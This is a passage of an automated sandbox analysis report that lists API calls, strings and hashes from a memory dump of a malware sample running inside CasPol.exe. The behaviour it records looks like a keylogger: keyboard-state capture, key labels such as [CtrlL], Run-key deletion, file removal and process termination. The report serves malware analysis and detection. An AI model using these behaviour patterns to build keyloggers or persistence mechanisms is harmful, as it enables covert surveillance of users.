                                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                            • String ID: [AltL]$[AltR]
                                                                                                            • API String ID: 2738857842-2658077756
• Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
• Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
• Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
• Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
APIs
• _free.LIBCMT ref: 00448825
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID: `@$`@
• API String ID: 1353095263-20545824
• Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
• Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
• Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
• Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
APIs
• GetKeyState.USER32(00000012), ref: 0040ADB5
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
• Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
• Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
• Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
• Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
• Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
• Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
• Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
• Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DeleteDirectoryFileRemove
• String ID: pth_unenc
• API String ID: 3325800564-4028850238
• Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
• Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
• Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
• Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
• WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ObjectProcessSingleTerminateWait
• String ID: pth_unenc
• API String ID: 1872346434-4028850238
• Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
• Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
• Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
• Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
• GetLastError.KERNEL32 ref: 0043FB02
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
• Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
• Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
• Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759